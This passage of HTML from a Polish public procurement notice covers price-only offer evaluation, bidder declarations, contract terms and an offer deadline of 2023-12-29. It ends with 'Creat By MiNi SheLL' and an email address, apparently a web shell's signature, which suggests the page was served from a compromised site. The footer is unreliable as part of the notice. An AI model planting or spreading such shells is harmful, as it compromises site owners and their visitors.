class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Cena brutto – 100 % znaczenia (Wc)<br/>Sposób dokonania oceny wg wzoru:<br/>WC = (Cn : Cb) x 100 pkt<br/>WC – wartość punktowa ceny brutto<br/>Cn – cena brutto najniższa<br/>Cb – cena brutto badanej oferty</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">nie dotyczy</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">nie dotyczy</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> nie dotyczy <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 10.1.1	Wypełniony i podpisany we wskazanych miejscach Załącznik nr 1 – formularz cenowy i opis przedmiotu zamówienia – zestawienie wymaganych i oferowanych parametrów,<br/>10.1.2	Wypełniony we wskazanych miejscach i podpisany Załącznik nr 2 –formularz ofertowy,<br/>10.1.3	Dokumenty rejestrowe potwierdzające posiadanie uprawnień/pełnomocnictwa potwierdzające umocowanie osób do składania oferty w imieniu Wykonawcy,<br/>10.1.4	Oświadczenie o braku podstaw wykluczenia z postępowania stanowiące wstępne potwierdzenie, że Wykonawca nie podlega wykluczeniu z postępowania według wzoru stanowiącego Załącznik nr 3 do SWZ (wypełnić pkt 3!!!! ewentualnie oświadczenie z pkt 4 dotyczące wykazanie rzetelności w sytuacji podleganiu wykluczeniu, ewentualnie oświadczenie z pkt 5, czyli oświadczenie Wykonawcy dotyczące podmiotu na które zasoby lub sytuację na które się wykonawca powołuje <br/>w zakresie braku podstaw do wykluczenia tego podmiotu), <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Ilości poszczególnych rodzajów towaru w opisie przedmiotu zamówienia mają charakter szacunkowy. Kupujący zastrzega<br/>sobie możliwość zmniejszenia przyjętych w umowie ilości i częstotliwości dostaw stosownie do swoich potrzeb.<br/>Niewykonanie przez Zamawiającego umowy w zakresie do 50% łącznej ceny brutto nie wymaga podania przyczyn i nie<br/>stanowi podstawy jego odpowiedzialności z tytułu niewykonania lub nienależytego wykonania umowy.<br/>W przypadku niewyczerpania w okresie obowiązywania umowy wartości brutto umowy Kupujący uprawniony będzie, na<br/>podstawie jednostronnego oświadczenia, złożonego Sprzedającemu przed upływem terminu umowy do przedłużenia<br/>terminu obowiązywania umowy o czas określony wskazany w oświadczeniu, nie dłużej niż o 90 dni <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> wzór umowy stanowi załącznik do SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-12-29 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-12-29 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-01-27</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com